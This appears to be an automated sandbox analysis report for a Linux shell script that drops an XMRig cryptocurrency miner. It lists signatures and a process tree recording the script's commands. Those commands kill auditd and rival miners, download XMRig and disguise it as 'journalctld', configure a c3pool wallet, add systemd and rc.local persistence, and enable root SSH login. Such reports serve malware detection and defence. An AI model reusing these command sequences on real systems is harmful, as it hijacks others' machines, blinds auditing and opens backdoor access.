Analysis
-
max time kernel
6s -
max time network
9s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240523-en -
resource tags
arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system -
submitted
04-11-2024 19:26
Static task
static1
Behavioral task
behavioral1
Sample
ee2a1838344c1b22dcea81766204f3692A.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
ee2a1838344c1b22dcea81766204f3692A.sh
-
Size
6KB
-
MD5
5e2f203cb513bf4b210ac61b009df327
-
SHA1
c77e72660d9034fe26137b040a3f073b7725d233
-
SHA256
07f9edc6e718ebcbead64e0a2afda717f9296e76a2a5654c2b50ad7e76cd4106
-
SHA512
7a3519c73104a327731dfa3a8507b72ea95d77f6eb8980bb072aad98c6955f11961d9716cb587cd8173fd9aa359158b91d6d59262cda496b80b32a822acd3247
-
SSDEEP
192:4prsOPBNttuJzzCdEifVHsmVHyC3Kx7OW81nFZBh2A7o7oNcoTuwFoFxuF0y:esOPBNttuJzzC3VHsmVHyCax7M1nFZBV
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/files/fstream-12.dat family_xmrig behavioral1/files/fstream-12.dat xmrig -
Xmrig family
-
Xmrig_linux family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 2974 chmod 2977 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /.local/.c/journalctld 2958 journalctld /.local/.c/journalctld 3254 journalctld -
OS Credential Dumping 1 TTPs 17 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
description ioc Process File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo File opened for reading /etc/shadow sudo -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 17 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 3114 sudo 2872 sudo 2874 sudo 2877 sudo 2893 sudo 2986 sudo 2884 sudo 2978 sudo 2984 sudo 2988 sudo 3248 sudo 3256 sudo 2882 sudo 2891 sudo 2895 sudo 2934 sudo 2936 sudo -
Checks hardware identifiers (DMI) 1 TTPs 8 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/sys_vendor journalctld File opened for reading /sys/devices/virtual/dmi/id/product_name journalctld File opened for reading /sys/devices/virtual/dmi/id/board_vendor journalctld File opened for reading /sys/devices/virtual/dmi/id/bios_vendor journalctld File opened for reading /sys/devices/virtual/dmi/id/sys_vendor journalctld File opened for reading /sys/devices/virtual/dmi/id/product_name journalctld File opened for reading /sys/devices/virtual/dmi/id/board_vendor journalctld File opened for reading /sys/devices/virtual/dmi/id/bios_vendor journalctld -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
description ioc Process File opened for modification /etc/rc.local ee2a1838344c1b22dcea81766204f3692A.sh -
Reads hardware information 1 TTPs 28 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag journalctld File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor journalctld File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag journalctld File opened for reading /sys/devices/virtual/dmi/id/chassis_version journalctld File opened for reading /sys/devices/virtual/dmi/id/chassis_version journalctld File opened for reading /sys/devices/virtual/dmi/id/product_uuid journalctld File opened for reading /sys/devices/virtual/dmi/id/board_version journalctld File opened for reading /sys/devices/virtual/dmi/id/chassis_serial journalctld File opened for reading /sys/devices/virtual/dmi/id/product_version journalctld File opened for reading /sys/devices/virtual/dmi/id/board_name journalctld File opened for reading /sys/devices/virtual/dmi/id/board_serial journalctld File opened for reading /sys/devices/virtual/dmi/id/chassis_type journalctld File opened for reading /sys/devices/virtual/dmi/id/board_name journalctld File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag journalctld File opened for reading /sys/devices/virtual/dmi/id/product_serial journalctld File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag journalctld File opened for reading /sys/devices/virtual/dmi/id/bios_date journalctld File opened for reading /sys/devices/virtual/dmi/id/chassis_type journalctld File opened for reading /sys/devices/virtual/dmi/id/chassis_serial journalctld File opened for reading /sys/devices/virtual/dmi/id/product_version journalctld File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor journalctld File opened for reading /sys/devices/virtual/dmi/id/product_serial journalctld File opened for reading /sys/devices/virtual/dmi/id/product_uuid journalctld File opened for reading /sys/devices/virtual/dmi/id/board_version journalctld File opened for reading /sys/devices/virtual/dmi/id/board_serial journalctld File opened for reading /sys/devices/virtual/dmi/id/bios_version journalctld File opened for reading /sys/devices/virtual/dmi/id/bios_date journalctld File opened for reading /sys/devices/virtual/dmi/id/bios_version journalctld -
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo ps File opened for reading /proc/cpuinfo journalctld File opened for reading /proc/cpuinfo journalctld -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/possible pkill File opened for reading /sys/devices/system/cpu/cpu0/topology/package_cpus journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition journalctld File opened for reading /sys/devices/system/cpu/cpu0/acpi_cppc/nominal_freq journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/possible journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type journalctld File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/level journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/online journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/id journalctld File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id journalctld File opened for reading /sys/devices/system/cpu/cpu0/topology/core_cpus journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id journalctld File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type journalctld File opened for reading /sys/devices/system/cpu/possible pkill File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id journalctld File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level journalctld File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/type journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq journalctld File opened for reading /sys/devices/system/cpu/online journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map journalctld File opened for reading /sys/devices/system/cpu/cpu0/acpi_cppc/nominal_freq journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets journalctld File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq journalctld File opened for reading /sys/devices/system/cpu/possible pkill File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/type journalctld File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size journalctld File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map journalctld -
Enumerates kernel/hardware configuration 1 TTPs 53 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/cgroup/cpuset.mems.effective journalctld File opened for reading /sys/devices/virtual/dmi/id journalctld File opened for reading /sys/devices/cpu_atom/cpus journalctld File opened for reading /sys/devices/system/node/node0/hugepages journalctld File opened for reading /sys/firmware/dmi/tables/smbios_entry_point journalctld File opened for reading /sys/devices/cpu_core/cpus journalctld File opened for reading /sys/devices/system/node/node0/access0/initiators journalctld File opened for reading /sys/devices/cpu_core/cpus journalctld File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency journalctld File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages journalctld File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth journalctld File opened for reading /sys/devices/system/node pkill File opened for reading /sys/devices/system/node ps File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages journalctld File opened for reading /sys/devices/system/node/online journalctld File opened for reading /sys/devices/system/node pkill File opened for reading /sys/bus/dax/devices journalctld File opened for reading /sys/bus/soc/devices journalctld File opened for reading /sys/devices/cpu_atom/cpus journalctld File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages journalctld File opened for reading /sys/devices/system/node/node0/cpumap journalctld File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages journalctld File opened for reading /sys/devices/system/node/node0/meminfo journalctld File opened for reading /sys/kernel/mm/hugepages journalctld File opened for reading /sys/devices/system/cpu journalctld File opened for reading /sys/devices/system/node pkill File opened for reading /sys/fs/cgroup/cpuset.mems.effective journalctld File opened for reading /sys/devices/system/cpu journalctld File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency journalctld File opened for reading /sys/devices/system/node pkill File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth journalctld File opened for reading /sys/kernel/mm/hugepages journalctld File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages journalctld File opened for reading /sys/devices/system/node/node0/access0/initiators journalctld File opened for reading /sys/fs/cgroup/cpuset.cpus.effective journalctld File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages journalctld File opened for reading /sys/devices/virtual/dmi/id journalctld File opened for reading /sys/devices/system/node/node0/meminfo journalctld File opened for reading /sys/devices/system/node/node0/access1/initiators journalctld File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages journalctld File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages journalctld File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth journalctld File opened for reading /sys/fs/cgroup/cpuset.cpus.effective journalctld File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth journalctld File opened for reading /sys/firmware/dmi/tables/DMI journalctld File opened for reading /sys/devices/system/node/online journalctld File opened for reading /sys/devices/system/node/node0/access1/initiators journalctld File opened for reading /sys/bus/dax/devices journalctld File opened for reading /sys/devices/system/node/node0/hugepages journalctld File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency journalctld File opened for reading /sys/devices/system/node/node0/cpumap journalctld File opened for reading /sys/bus/soc/devices journalctld File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency journalctld -
Process Discovery 1 TTPs 1 IoCs
Adversaries may try to discover information about running processes.
pid Process 2888 ps -
description ioc Process File opened for reading /proc/2651/cmdline pidof File opened for reading /proc/184/stat killall File opened for reading /proc/1768 killall File opened for reading /proc/375/cmdline pidof File opened for reading /proc/31/stat pidof File opened for reading /proc/7/ctty pkill File opened for reading /proc/2055/cgroup pkill File opened for reading /proc/37/cgroup pkill File opened for reading /proc/2346/stat killall File opened for reading /proc/2889/stat ps File opened for reading /proc/1067 killall File opened for reading /proc/2539/cgroup pkill File opened for reading /proc/192/status pkill File opened for reading /proc/2350/stat killall File opened for reading /proc/432/cmdline pidof File opened for reading /proc/20/cmdline pidof File opened for reading /proc/53/cmdline pidof File opened for reading /proc/40/stat killall File opened for reading /proc/2181 killall File opened for reading /proc/2318/stat killall File opened for reading /proc/2296/stat pidof File opened for reading /proc/2369/cmdline pidof File opened for reading /proc/2345/stat killall File opened for reading /proc/357/ctty pkill File opened for reading /proc/202/cmdline pkill File opened for reading /proc/26/cgroup pkill File opened for reading /proc/17/stat killall File opened for reading /proc/2087/cmdline killall File opened for reading /proc/39/status pkill File opened for reading /proc/2539/stat pkill File opened for reading /proc/filesystems systemctl File opened for reading /proc/198/stat killall File opened for reading /proc/2284/cmdline killall File opened for reading /proc/392/environ ps File opened for reading /proc/47/stat killall File opened for reading /proc/783/stat pkill File opened for reading /proc/190/cmdline pidof File opened for reading /proc/56/stat pkill File opened for reading /proc/201/status pkill File opened for reading /proc/2876/cgroup pkill File opened for reading /proc/513/cmdline killall File opened for reading /proc/194/stat pkill File opened for reading /proc/49/cmdline ps File opened for reading /proc/192/cgroup pkill File opened for reading /proc/1/limits sudo File opened for reading /proc/47/cmdline pkill File opened for reading /proc/2565/ctty ps File opened for reading /proc/22/stat killall File opened for reading /proc/275/ctty pkill File opened for reading /proc/2296/cgroup pkill File opened for reading /proc/198/environ ps File opened for reading /proc/1255/environ ps File opened for reading /proc/2525/stat pkill File opened for reading /proc/41/cmdline pidof File opened for reading /proc/2350/stat pidof File opened for reading /proc/2074/environ ps File opened for reading /proc/192/stat killall File opened for reading /proc/235/stat pkill File opened for reading /proc/36/stat pkill File opened for reading /proc/2682/status pkill File opened for reading /proc/185/cmdline killall File opened for reading /proc/2353 killall File opened for reading /proc/2359/cmdline killall File opened for reading /proc/filesystems sudo -
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 2954 tar -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/xmrig.tar.gz curl File opened for modification /tmp/journalctld.service ee2a1838344c1b22dcea81766204f3692A.sh
Processes
-
/tmp/ee2a1838344c1b22dcea81766204f3692A.sh/tmp/ee2a1838344c1b22dcea81766204f3692A.sh1⤵
- Modifies rc script
- Writes file to tmp directory
PID:2870 -
/usr/bin/sudosudo systemctl stop c3pool_miner.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:2872 -
/usr/bin/systemctlsystemctl stop c3pool_miner.service3⤵PID:2873
-
-
-
/usr/bin/sudosudo systemctl disable c3pool_miner.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:2874 -
/usr/bin/systemctlsystemctl disable c3pool_miner.service3⤵PID:2875
-
-
-
/usr/bin/sudosudo systemctl disable xmrig.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:2877 -
/usr/bin/systemctlsystemctl disable xmrig.service3⤵
- Reads runtime system information
PID:2881
-
-
-
/usr/bin/sudosudo systemctl stop journalctld.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:2882 -
/usr/bin/systemctlsystemctl stop journalctld.service3⤵PID:2883
-
-
-
/usr/bin/sudosudo systemctl disable journalctld.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:2884 -
/usr/bin/systemctlsystemctl disable journalctld.service3⤵PID:2885
-
-
-
/usr/bin/pidofpidof xmrig2⤵
- Reads runtime system information
PID:2886
-
-
/usr/bin/psps aux2⤵
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Process Discovery
- Reads runtime system information
PID:2888
-
-
/usr/bin/grepgrep "[--]config="2⤵PID:2889
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2890
-
-
/usr/bin/sudosudo killall xmrig2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:2891 -
/usr/bin/killallkillall xmrig3⤵
- Reads runtime system information
PID:2892
-
-
-
/usr/bin/sudosudo pkill xmrig2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:2893 -
/usr/bin/pkillpkill xmrig3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:2894
-
-
-
/usr/bin/sudosudo pkill auditd2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:2895 -
/usr/bin/pkillpkill auditd3⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:2896
-
-
-
/usr/bin/killallkillall -9 xmrig2⤵
- Reads runtime system information
PID:2898
-
-
/usr/bin/killallkillall xmrig2⤵
- Reads runtime system information
PID:2899
-
-
/usr/bin/pkillpkill xmrig2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:2900
-
-
/usr/bin/pkillpkill auditd2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:2901
-
-
/usr/bin/killallkillall auditd2⤵
- Reads runtime system information
PID:2902
-
-
/usr/bin/rmrm -rf rm -rf /root/.local/.c2⤵PID:2903
-
-
/usr/bin/rmrm -rf /.c3pool2⤵PID:2904
-
-
/usr/bin/rmrm -rf /root/.c3pool2⤵PID:2905
-
-
/usr/bin/rmrm -rf /.local/share/auditd2⤵PID:2906
-
-
/usr/bin/rmrm -rf "/.local/.c*"2⤵PID:2907
-
-
/usr/bin/rmrm -rf /.local/bin/auditd2⤵PID:2908
-
-
/usr/bin/rmrm -rf /etc/cron.daily2⤵PID:2909
-
-
/usr/bin/rmrm -rf /etc/cron.daily/auditd2⤵PID:2910
-
-
/usr/bin/rmrm -rf /etc/systemd/system/journalctld.service2⤵PID:2911
-
-
/usr/bin/findfind . -name "*c3pool*" -exec rm -rf "{}" ";"2⤵PID:2912
-
-
/usr/bin/findfind . -name "*xmrig*" -exec rm -rf "{}" ";"2⤵PID:2913
-
-
/usr/bin/findfind . -name "*miner*" -exec rm -rf "{}" ";"2⤵PID:2914
-
-
/usr/bin/findfind -name "*c3pool*" -exec rm -rf "{}" ";"2⤵PID:2915
-
-
/usr/bin/findfind -name "*xmrig*" -exec rm -rf "{}" ";"2⤵PID:2916
-
-
/usr/bin/findfind -name "*miner*" -exec rm -rf "{}" ";"2⤵PID:2917
-
-
/usr/bin/findfind -name "*c4*" -exec rm -rf "{}" ";"2⤵PID:2918
-
-
/usr/bin/findfind -name "*auditd*" -exec rm -rf "{}" ";"2⤵PID:2919
-
-
/usr/bin/sedsed -i /AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d /.ssh/authorized_keys2⤵PID:2920
-
-
/usr/bin/sedsed -i /AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d /root/.ssh/authorized_keys2⤵PID:2921
-
-
/usr/bin/sedsed -i "/c3pool/d;/miner.sh/d" /.profile2⤵PID:2922
-
-
/usr/bin/sedsed -i "/c3pool/d;/miner.sh/d" /root/.profile2⤵PID:2923
-
-
/usr/bin/mkdirmkdir /.ssh2⤵PID:2924
-
-
/usr/bin/touchtouch /.ssh/authorized_keys2⤵PID:2925
-
-
/usr/bin/chmodchmod 600 /.ssh/authorized_keys2⤵PID:2926
-
-
/usr/bin/chmodchmod go-w /root/2⤵PID:2928
-
-
/usr/bin/chmodchmod go-w /root2⤵PID:2929
-
-
/usr/bin/chmodchmod 700 /root/.ssh2⤵PID:2930
-
-
/usr/bin/chmodchmod 700 /root/.ssh2⤵PID:2931
-
-
/usr/bin/chmodchmod 600 /root/.ssh/authorized_keys2⤵PID:2932
-
-
/usr/bin/chownchown root /root2⤵PID:2933
-
-
/usr/bin/chownchown root /root/.ssh2⤵PID:2927
-
-
/usr/bin/sudosudo sed -i "s/#PermitRootLogin prohibit-password/PermitRootLogin yes/" /etc/ssh/sshd_config2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:2934 -
/usr/bin/sedsed -i "s/#PermitRootLogin prohibit-password/PermitRootLogin yes/" /etc/ssh/sshd_config3⤵PID:2935
-
-
-
/usr/bin/sudosudo sed -i "s/#PubkeyAuthentication yes/PubkeyAuthentication yes/" /etc/ssh/sshd_config2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:2936 -
/usr/bin/sedsed -i "s/#PubkeyAuthentication yes/PubkeyAuthentication yes/" /etc/ssh/sshd_config3⤵PID:2937
-
-
-
/usr/bin/mkdirmkdir -p /.local/.c2⤵PID:2943
-
-
/.local/.c/journalctld/.local/.c/journalctld --help2⤵PID:2944
-
-
/usr/bin/grepgrep browser_download2⤵PID:2947
-
-
/usr/bin/curlcurl -s4 https://api.github.com/repos/xmrig/xmrig/releases/latest2⤵PID:2946
-
-
/usr/bin/grepgrep linux-static2⤵PID:2948
-
-
/usr/bin/cutcut "-d\"" -f42⤵PID:2949
-
-
/usr/bin/curlcurl -s4 -L https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz -o /tmp/xmrig.tar.gz2⤵
- Writes file to tmp directory
PID:2951
-
-
/usr/bin/tartar xf /tmp/xmrig.tar.gz -C /.local/.c "--strip=1"2⤵
- System Network Configuration Discovery
PID:2954 -
/usr/local/sbin/gzipgzip -d3⤵PID:2955
-
-
/usr/local/bin/gzipgzip -d3⤵PID:2955
-
-
/usr/sbin/gzipgzip -d3⤵PID:2955
-
-
/usr/bin/gzipgzip -d3⤵PID:2955
-
-
-
/usr/bin/rmrm /tmp/xmrig.tar.gz2⤵PID:2956
-
-
/usr/bin/mvmv /.local/.c/xmrig /.local/.c/journalctld2⤵PID:2957
-
-
/.local/.c/journalctld/.local/.c/journalctld --help2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:2958
-
-
/usr/bin/hostnamehostname2⤵PID:2960
-
-
/usr/bin/cutcut -f1 -d.2⤵PID:2961
-
-
/usr/bin/sedsed -r "s/[^a-zA-Z0-9\\-]+/_/g"2⤵PID:2962
-
-
/usr/bin/sedsed -i "s/\"url\": *\"[^\"]*\",/\"url\": \"auto.c3pool.org:19999\",/" /.local/.c/config.json2⤵PID:2963
-
-
/usr/bin/sedsed -i "s/\"user\": *\"[^\"]*\",/\"user\": \"4A8Ye8K9azyVuTvjBCDDZYLmX62A2ivpyQJD97MTsCtCK36Q4QF5xq84ey8DMjxSFc7VUTNh6xx58jPuMP3qp4v2RK42Cb7\",/" /.local/.c/config.json2⤵PID:2964
-
-
/usr/bin/sedsed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"ubuntu2404-amd64-20240523-en-3\",/" /.local/.c/config.json2⤵PID:2965
-
-
/usr/bin/sedsed -i "s/\"max-cpu-usage\": *[^,]*,/\"max-cpu-usage\": 100,/" /.local/.c/config.json2⤵PID:2966
-
-
/usr/bin/sedsed -i "s#\"log-file\": *null,#\"log-file\": \"/.local/.c/journalctld.log\",#" /.local/.c/config.json2⤵PID:2967
-
-
/usr/bin/sedsed -i "s/\"syslog\": *[^,]*,/\"syslog\": false,/" /.local/.c/config.json2⤵PID:2968
-
-
/usr/bin/sedsed -i "s/\"max-threads-hint\": *[^,]*,/\"max-threads-hint\": 75,/" /.local/.c/config.json2⤵PID:2969
-
-
/usr/bin/sedsed -i "s/\"background\": *[^,]*,/\"background\": false,/" /.local/.c/config.json2⤵PID:2970
-
-
/usr/bin/cpcp /.local/.c/config.json /.local/.c/config_background.json2⤵PID:2971
-
-
/usr/bin/sedsed -i "s/\"background\": *false,/\"background\": true,/" /.local/.c/config_background.json2⤵PID:2972
-
-
/usr/bin/catcat2⤵PID:2973
-
-
/usr/bin/chmodchmod +x /.local/.c/journalctl2⤵
- File and Directory Permissions Modification
PID:2974
-
-
/usr/bin/grepgrep journalctl /.profile2⤵PID:2975
-
-
/usr/bin/grepgrep journalctl /etc/rc.local2⤵PID:2976
-
-
/usr/bin/chmodchmod a+x /etc/rc.local2⤵
- File and Directory Permissions Modification
PID:2977
-
-
/usr/bin/sudosudo -n true2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:2978 -
/usr/bin/truetrue3⤵PID:2979
-
-
-
/usr/bin/grepgrep MemTotal /proc/meminfo2⤵PID:2981
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2982
-
-
/usr/bin/catcat2⤵PID:2983
-
-
/usr/bin/sudosudo mv /tmp/journalctld.service /etc/systemd/system/journalctld.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:2984 -
/usr/bin/mvmv /tmp/journalctld.service /etc/systemd/system/journalctld.service3⤵PID:2985
-
-
-
/usr/bin/sudosudo killall journalctld2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:2986 -
/usr/bin/killallkillall journalctld3⤵
- Reads runtime system information
PID:2987
-
-
-
/usr/bin/sudosudo systemctl daemon-reload2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:2988 -
/usr/bin/systemctlsystemctl daemon-reload3⤵PID:2989
-
-
-
/usr/bin/sudosudo systemctl enable journalctld.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:3114 -
/usr/bin/systemctlsystemctl enable journalctld.service3⤵PID:3117
-
-
-
/usr/bin/sudosudo systemctl restart journalctld.service2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:3248 -
/usr/bin/systemctlsystemctl restart journalctld.service3⤵PID:3249
-
-
-
/usr/bin/pidofpidof journalctld2⤵
- Reads runtime system information
PID:3251
-
-
/bin/bash/bin/bash /.local/.c/journalctl "--config=/.local/.c/config_background.json"2⤵PID:3252
-
/usr/bin/pidofpidof journalctld3⤵
- Reads runtime system information
PID:3253
-
-
/usr/bin/nicenice /.local/.c/journalctld "--config=/.local/.c/config_background.json"3⤵PID:3254
-
-
/.local/.c/journalctld/.local/.c/journalctld "--config=/.local/.c/config_background.json"3⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:3254
-
-
-
/usr/bin/sudosudo /etc/init.d/ssh restart2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:3256 -
/etc/init.d/ssh/etc/init.d/ssh restart3⤵PID:3257
-
/usr/sbin/sshd/usr/sbin/sshd "-?"4⤵PID:3259
-
-
/usr/bin/grepgrep -q OpenSSH4⤵PID:3260
-
-
/usr/bin/run-partsrun-parts --lsbsysinit --list /lib/lsb/init-functions.d4⤵PID:3266
-
-
/usr/bin/systemctlsystemctl -p LoadState --value show ssh.service4⤵PID:3268
-
-
/usr/bin/readlinkreadlink -f /etc/init.d/ssh4⤵PID:3269
-
-
/usr/bin/systemctlsystemctl -p CanReload --value show ssh.service4⤵PID:3270
-
-
/usr/bin/systemctlsystemctl --quiet is-system-running4⤵PID:3271
-
-
